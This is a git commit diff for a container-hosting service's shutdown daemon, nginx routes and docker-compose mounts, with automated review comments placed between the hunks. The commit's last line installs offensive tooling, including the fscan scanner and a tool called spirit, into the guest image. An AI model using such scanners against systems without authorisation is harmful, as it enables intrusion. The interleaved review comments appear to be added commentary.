guest docker bumping
This commit is contained in:
parent
fc10201e80
commit
44f0018fff
@ -1,7 +1,10 @@
|
|||||||
0.5.4 - 2023-02-00
|
0.5.4 - 2023-02-00
|
||||||
|
* OpenSSH 9.6p1
|
||||||
* rshell
|
* rshell
|
||||||
* sploitscan
|
* sploitscan
|
||||||
* OpenVPN (curl sf/vpn)
|
* OpenVPN (curl sf/ovpn)
|
||||||
|
* Different auto-shutdown timers for FREE and TOKEN users
|
||||||
|
* Syscop login message after auto-shutdown
|
||||||
|
|
||||||
0.5.2 - 2023-12-00
|
0.5.2 - 2023-12-00
|
||||||
* Kali 2023.4
|
* Kali 2023.4
|
||||||
|
4
Makefile
4
Makefile
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
|
|||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
||||||
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
||||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
||||||
|
|
||||||
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
|
|||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
||||||
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
||||||
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
||||||
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
|
|||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
||||||
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
||||||
|
@ -69,13 +69,15 @@ http {
|
|||||||
gzip off;
|
gzip off;
|
||||||
|
|
||||||
location / {
|
location / {
|
||||||
try_files $uri $uri/ = 404;
|
#try_files $uri $uri/ = 404;
|
||||||
rewrite /net /net/;
|
rewrite ^/net$ /net/ last;
|
||||||
rewrite /vpn /vpn/;
|
rewrite ^/ovpn$ /ovpn/ last;
|
||||||
rewrite /wg /wg/;
|
rewrite ^/vpn$ /ovpn/ last;
|
||||||
rewrite /dmesg /dmesg/;
|
rewrite ^/wg$ /wg/ last;
|
||||||
rewrite /port /port/;
|
rewrite ^/dmesg$ /dmesg/ last;
|
||||||
rewrite /set /set/;
|
rewrite ^/port$ /port/ last;
|
||||||
|
rewrite ^/set$ /set/ last;
|
||||||
|
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
|
||||||
|
|
||||||
location ~* ^/set/.* {
|
location ~* ^/set/.* {
|
||||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||||
@ -101,11 +103,11 @@ http {
|
|||||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||||
}
|
}
|
||||||
location ~* ^/vpn/.* {
|
location ~* ^/ovpn/.* {
|
||||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||||
fastcgi_param REQUEST_URI $request_uri;
|
fastcgi_param REQUEST_URI $request_uri;
|
||||||
fastcgi_param REQUEST_BODY $request_body;
|
fastcgi_param REQUEST_BODY $request_body;
|
||||||
fastcgi_param FCGI_CMD vpn;
|
fastcgi_param FCGI_CMD ovpn;
|
||||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||||
}
|
}
|
||||||
|
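Review bot: `#try_files $uri $uri/ = 404;` is left as a commented-out directive inside `location /` rather than deleted, and nothing says why it was disabled; presumably so that the `rewrite … last;` lines below run before any file lookup, but that is a guess. Either drop the line or replace it with a one-line reason, e.g. `# try_files removed: the rewrites below must be evaluated before any static lookup`. The compatibility rewrites `^/vpn$ /ovpn/` and `^/vpn/(.*)$ /ovpn/$1` only work because `location ~* ^/vpn/.*` was renamed to `^/ovpn/.*` so old URLs now fall into `location /`; a short comment next to them naming them as legacy-URL shims would keep a future cleanup from breaking `curl sf/vpn`. The enclosing `http {}` block starts and ends outside the hunk.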
6
config/etc/sf/timers.conf
Normal file
6
config/etc/sf/timers.conf
Normal file
@ -0,0 +1,6 @@
|
|||||||
|
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||||
|
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||||
|
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||||
|
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||||
|
|
||||||
|
|
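Review bot: The new file has no header saying what it is or how it is consumed, and its contents are bash, not a key=value config: per the encfsd/destructor.sh hunk in this commit it is `source`d every 30 s by the loop in destructor.sh. Suggest a two-line header, `# Sourced as bash by encfsd/destructor.sh every 30s. Values are seconds; uncomment a line to override the built-in default.` and `# Anything here runs inside the container holding /var/run/docker.sock - keep the bind mount :ro and the host file owned by the admin only.` The docker-compose hunk mounts `config/etc/sf` `:ro` in both services, which is the right setting for a file that executes as code.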
@ -40,7 +40,7 @@ services:
|
|||||||
devices:
|
devices:
|
||||||
- "/dev/fuse:/dev/fuse"
|
- "/dev/fuse:/dev/fuse"
|
||||||
volumes:
|
volumes:
|
||||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
- "${SF_BASEDIR:-.}/config/db:/config/db:rw"
|
||||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||||
@ -76,6 +76,7 @@ services:
|
|||||||
- "/dev/fuse:/dev/fuse"
|
- "/dev/fuse:/dev/fuse"
|
||||||
volumes:
|
volumes:
|
||||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||||
|
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
||||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||||
|
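Review bot: The first hunk widens `${SF_BASEDIR:-.}/config/db` from `:ro` to `:rw` for the service at line 40 (the one with the `encfs-sec … :shared` mount, which I take to be encfsd) with no comment on why. The only new writer I can see in this commit is `try_syscop_msg` in encfsd/funcs_destructor.sh, which creates `/config/db/user/lg-<lid>/syscop-msg.txt`; the whole db tree becomes writable from that container, not just that file, while the service at line 76 keeps it `:ro`. Record the reason inline so the mount is not silently reverted or widened later, `- "${SF_BASEDIR:-.}/config/db:/config/db:rw" # rw: destructor writes user/lg-*/syscop-msg.txt`. If that file is the only write, a narrower `config/db/user` mount would keep the rest read-only.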
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
|
|||||||
encfs \
|
encfs \
|
||||||
redis \
|
redis \
|
||||||
xfsprogs-extra
|
xfsprogs-extra
|
||||||
COPY destructor.sh encfsd.sh portd.sh /
|
COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
|
||||||
|
@ -3,149 +3,28 @@
|
|||||||
# shellcheck disable=SC1091 # Do not follow
|
# shellcheck disable=SC1091 # Do not follow
|
||||||
source /sf/bin/funcs.sh
|
source /sf/bin/funcs.sh
|
||||||
source /sf/bin/funcs_redis.sh
|
source /sf/bin/funcs_redis.sh
|
||||||
|
|
||||||
SF_TIMEOUT_WITH_SHELL=604800
|
# Defaults
|
||||||
SF_TIMEOUT_NO_SHELL=129600
|
SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||||
|
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||||
|
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||||
|
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||||
[[ -n $SF_DEBUG ]] && {
|
[[ -n $SF_DEBUG ]] && {
|
||||||
SF_TIMEOUT_WITH_SHELL=180
|
SF_TIMEOUT_WITH_SHELL=60
|
||||||
SF_TIMEOUT_NO_SHELL=120
|
SF_TIMEOUT_NO_SHELL=15
|
||||||
}
|
SF_TIMEOUT_TOKEN_WITH_SHELL=120
|
||||||
|
SF_TIMEOUT_TOKEN_NO_SHELL=90
|
||||||
# [LID] <1=encfs> <1=Container> <message>
|
|
||||||
# Either parameter can be "" to not stop encfs or lg-container
|
|
||||||
stop_lg()
|
|
||||||
{
|
|
||||||
local is_encfs
|
|
||||||
local is_container
|
|
||||||
local lid
|
|
||||||
local ts_born
|
|
||||||
lid="$1"
|
|
||||||
ts_born="$2"
|
|
||||||
is_encfs="$3"
|
|
||||||
is_container="$4"
|
|
||||||
|
|
||||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
|
||||||
|
|
||||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
|
||||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
|
||||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
|
||||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
|
||||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
|
||||||
rm -rf "/sf/run/users/lg-${lid}"
|
|
||||||
|
|
||||||
# Kill the OpenVPN process (if running)
|
|
||||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
|
||||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
|
||||||
|
|
||||||
# Tear down container
|
|
||||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
|
||||||
|
|
||||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
|
||||||
# inside the container even that we never moved it into the container's
|
|
||||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
|
||||||
# This is only neede for cgroup1:
|
|
||||||
[[ -n $is_encfs ]] && {
|
|
||||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
|
||||||
# Give kernel time to unmount mountpoint
|
|
||||||
sleep 1
|
|
||||||
}
|
|
||||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
|
||||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
|
||||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
|
||||||
rmdir "/encfs/sec/lg-${lid}"
|
|
||||||
}
|
|
||||||
|
|
||||||
# [lg-$LID]
|
|
||||||
# Check if lg- is running and
|
|
||||||
# 1. EncFS died
|
|
||||||
# 2. Container should be stopped (stale, idle)
|
|
||||||
check_container()
|
|
||||||
{
|
|
||||||
local c
|
|
||||||
local lid
|
|
||||||
local i
|
|
||||||
local IFS
|
|
||||||
local fn
|
|
||||||
local comm
|
|
||||||
local ts_logout
|
|
||||||
local ts_born
|
|
||||||
IFS=$'\n'
|
|
||||||
|
|
||||||
c="$1"
|
|
||||||
lid="${c#lg-}"
|
|
||||||
|
|
||||||
[[ ${#lid} -ne 10 ]] && return
|
|
||||||
|
|
||||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
|
||||||
# Skip if EncFS only started recently (zsh not yet started).
|
|
||||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
|
||||||
|
|
||||||
# Check if EncFS is still running.
|
|
||||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
|
||||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
|
||||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
# ts_logout may not exist (stale)
|
|
||||||
ts_logout=0
|
|
||||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
|
||||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
|
||||||
|
|
||||||
# Check if there is still a shell running inside the container:
|
|
||||||
IFS=""
|
|
||||||
set -o pipefail
|
|
||||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
|
||||||
# HERE: lg died or top failed.
|
|
||||||
set +o pipefail
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
set +o pipefail
|
|
||||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
|
||||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
|
||||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
|
||||||
|
|
||||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
|
||||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
|
||||||
|
|
||||||
# HERE: LG & EncFS are running.
|
|
||||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
|
||||||
# HERE: User still has shell running
|
|
||||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
|
||||||
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
|
|
||||||
# HERE: Not logged in. logged out more than 1 week ago.
|
|
||||||
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
# HERE: No shell running, ts_logout=0 if never logged out
|
|
||||||
|
|
||||||
# Skip if only recently logged out.
|
|
||||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
|
||||||
|
|
||||||
# Filter out stale processes
|
|
||||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
|
||||||
# HERE: Nothing running but stale processes
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
# HERE: Something running (but no shell, and no known processes)
|
|
||||||
|
|
||||||
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
|
|
||||||
# User logged out 1.5 days ago. No shell. No known processes.
|
|
||||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
|
||||||
}
|
}
|
||||||
|
|
||||||
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
||||||
|
source /funcs_destructor.sh || ERREXIT 255
|
||||||
|
|
||||||
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
||||||
|
|
||||||
while :; do
|
while :; do
|
||||||
sleep 30
|
sleep 30
|
||||||
|
source /config/etc/sf/timers.conf 2>/dev/null
|
||||||
|
source /funcs_destructor.sh 2>/dev/null
|
||||||
NOW=$(date +%s)
|
NOW=$(date +%s)
|
||||||
# Every 30 seconds check all container we are tracking (from encfsd)
|
# Every 30 seconds check all container we are tracking (from encfsd)
|
||||||
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
||||||
|
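Review bot: The timer defaults under `# Defaults` (and the `SF_DEBUG` overrides) are set once at startup, but `source /config/etc/sf/timers.conf 2>/dev/null` now runs on every loop iteration; a value that is set in timers.conf and later commented out again keeps its last sourced value until the daemon restarts, which is hard to diagnose. Re-applying the defaults before each source fixes that, see below. The in-loop `source /funcs_destructor.sh 2>/dev/null` also ignores a failure that the startup `source /funcs_destructor.sh || ERREXIT 255` treats as fatal; if a broken edit of that file is meant to be tolerated at runtime, say so in a comment, otherwise use the same `|| ERREXIT 255`. Since timers.conf is executed as bash by this process, which drives `docker exec`, the comment in the fence records that it must stay on a read-only mount. The `while :; do` loop continues past the end of the hunk.
```shell
# Defaults. Wrapped in a function and re-applied on every loop so that a
# value removed from timers.conf falls back to the default instead of
# keeping whatever was sourced last.
set_default_timers() {
	SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
	SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
	SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
	SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
	[[ -n $SF_DEBUG ]] && {
		SF_TIMEOUT_WITH_SHELL=60
		SF_TIMEOUT_NO_SHELL=15
		SF_TIMEOUT_TOKEN_WITH_SHELL=120
		SF_TIMEOUT_TOKEN_NO_SHELL=90
	}
	return 0
}
# … unchanged: docker.sock check, initial source of /funcs_destructor.sh, REDISCLI_AUTH …
while :; do
	sleep 30
	set_default_timers
	# timers.conf is executed as bash by this process: it must stay on a :ro mount.
	source /config/etc/sf/timers.conf 2>/dev/null
	# … unchanged: re-source of /funcs_destructor.sh, NOW=…, container loop …
```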
153
encfsd/funcs_destructor.sh
Executable file
153
encfsd/funcs_destructor.sh
Executable file
@ -0,0 +1,153 @@
|
|||||||
|
|
||||||
|
# [LID] <1=encfs> <1=Container> <message>
|
||||||
|
# Either parameter can be "" to not stop encfs or lg-container
|
||||||
|
stop_lg()
|
||||||
|
{
|
||||||
|
local is_encfs
|
||||||
|
local is_container
|
||||||
|
local lid
|
||||||
|
local ts_born
|
||||||
|
lid="$1"
|
||||||
|
ts_born="$2"
|
||||||
|
is_encfs="$3"
|
||||||
|
is_container="$4"
|
||||||
|
|
||||||
|
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||||
|
|
||||||
|
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||||
|
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||||
|
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||||
|
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||||
|
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||||
|
rm -rf "/sf/run/users/lg-${lid}"
|
||||||
|
|
||||||
|
# Kill the OpenVPN process (if running)
|
||||||
|
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||||
|
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||||
|
|
||||||
|
# Tear down container
|
||||||
|
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||||
|
|
||||||
|
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||||
|
# inside the container even that we never moved it into the container's
|
||||||
|
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||||
|
# This is only neede for cgroup1:
|
||||||
|
[[ -n $is_encfs ]] && {
|
||||||
|
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||||
|
# Give kernel time to unmount mountpoint
|
||||||
|
sleep 1
|
||||||
|
}
|
||||||
|
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||||
|
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||||
|
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||||
|
rmdir "/encfs/sec/lg-${lid}"
|
||||||
|
}
|
||||||
|
|
||||||
|
try_syscop_msg() {
|
||||||
|
local lid="$1"
|
||||||
|
echo -en "\
|
||||||
|
🤷♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
|
||||||
|
🫵 Please type ${CDC}halt${CDM} to stop your server or...
|
||||||
|
❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
|
||||||
|
|
||||||
|
🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
|
||||||
|
">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
|
||||||
|
}
|
||||||
|
|
||||||
|
# [lg-$LID]
|
||||||
|
# Check if lg- is running and
|
||||||
|
# 1. EncFS died
|
||||||
|
# 2. Container should be stopped (stale, idle)
|
||||||
|
check_container()
|
||||||
|
{
|
||||||
|
local c
|
||||||
|
local lid
|
||||||
|
local IFS=$'\n'
|
||||||
|
local fn
|
||||||
|
local comm
|
||||||
|
local ts_logout
|
||||||
|
local ts_born
|
||||||
|
local to_with_shell=$SF_TIMEOUT_WITH_SHELL
|
||||||
|
local to_no_shell=$SF_TIMEOUT_NO_SHELL
|
||||||
|
local is_token
|
||||||
|
|
||||||
|
c="$1"
|
||||||
|
lid="${c#lg-}"
|
||||||
|
|
||||||
|
[[ ${#lid} -ne 10 ]] && return
|
||||||
|
|
||||||
|
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||||
|
# Skip if EncFS only started recently (zsh not yet started).
|
||||||
|
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||||
|
|
||||||
|
# Check if EncFS is still running.
|
||||||
|
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||||
|
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||||
|
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# ts_logout may not exist (stale)
|
||||||
|
ts_logout=0
|
||||||
|
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||||
|
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||||
|
|
||||||
|
# Check if there is still a shell running inside the container:
|
||||||
|
IFS=""
|
||||||
|
set -o pipefail
|
||||||
|
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||||
|
# HERE: lg died or top failed.
|
||||||
|
set +o pipefail
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# Load timers
|
||||||
|
[[ -e "/config/db/user/lg-${lid}/token" ]] && {
|
||||||
|
to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
|
||||||
|
to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
|
||||||
|
is_token=1
|
||||||
|
}
|
||||||
|
set +o pipefail
|
||||||
|
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||||
|
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||||
|
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||||
|
|
||||||
|
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||||
|
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||||
|
|
||||||
|
# HERE: LG & EncFS are running.
|
||||||
|
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||||
|
# HERE: User still has shell running
|
||||||
|
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||||
|
[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
|
||||||
|
# HERE: Not logged in. logged out more than 1 week ago.
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||||
|
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||||
|
|
||||||
|
return
|
||||||
|
}
|
||||||
|
# HERE: No shell running, ts_logout=0 if never logged out
|
||||||
|
|
||||||
|
# Skip if only recently logged out.
|
||||||
|
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||||
|
|
||||||
|
# Filter out stale processes
|
||||||
|
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||||
|
# HERE: Nothing running but stale processes
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||||
|
return
|
||||||
|
}
|
||||||
|
# HERE: Something running (but no shell, and no known processes)
|
||||||
|
|
||||||
|
[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
|
||||||
|
# User logged out 1.5 days ago. No shell. No known processes.
|
||||||
|
|
||||||
|
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
|
||||||
|
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||||
|
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||||
|
}
|
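Review bot: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill` in stop_lg redirects to `/dev/nuill`, a typo for `/dev/null`, so every container stop creates or appends to a regular file of that name in the container instead of discarding the output (carried over from the old destructor.sh, but this is a new file). Fix: `[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/null`. Separately, `try_syscop_msg` derives the "did not log in for … h" figure from `ts_logout`, which it never receives: it works only through bash's dynamic scoping of check_container's local, and in the no-shell branch (`[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]]`) `ts_logout` is 0 when the user never logged out (per the comment `ts_logout=0 if never logged out`), so the message would report roughly NOW/3600 hours. Pass it explicitly, `try_syscop_msg "$lid" "$ts_logout"`, and inside the function treat 0 as "never", or drop the number from the text.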
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||||||
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
